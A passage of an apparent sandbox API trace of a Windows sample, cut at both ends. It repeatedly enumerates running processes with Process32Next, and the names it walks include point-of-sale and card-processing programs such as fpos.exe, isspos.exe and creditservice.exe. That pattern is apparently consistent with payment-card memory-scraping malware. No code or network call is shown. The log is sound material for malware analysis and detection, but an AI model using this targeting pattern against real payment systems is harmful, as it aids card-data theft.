pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0218.747] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0218.749] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0218.750] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0218.752] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0218.754] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0218.756] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0218.796] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0218.798] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0218.799] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0218.801] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0218.803] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0218.804] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0218.806] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.808] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.809] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0218.829] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.832] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.833] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0218.835] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.837] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0218.838] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.840] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0218.842] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.843] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0218.845] CloseHandle (hObject=0x1eb8) returned 1 [0218.845] Sleep (dwMilliseconds=0x64) [0218.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0218.911] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.912] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.914] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.916] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.917] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.919] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.921] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.922] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.927] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.929] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.974] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.976] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.979] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.982] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.984] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.986] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.987] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.989] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.991] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.992] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.994] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0218.996] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.998] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0218.999] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.001] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0219.003] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0219.004] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0219.007] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0219.009] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.012] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.051] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.053] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.054] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0219.059] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.084] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.085] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.087] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0219.088] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0219.090] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0219.091] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0219.093] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0219.095] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0219.102] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0219.104] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0219.105] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0219.107] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0219.109] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0219.110] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0219.119] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0219.121] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0219.122] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0219.175] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0219.178] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0219.181] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0219.183] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0219.184] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0219.186] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0219.187] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: 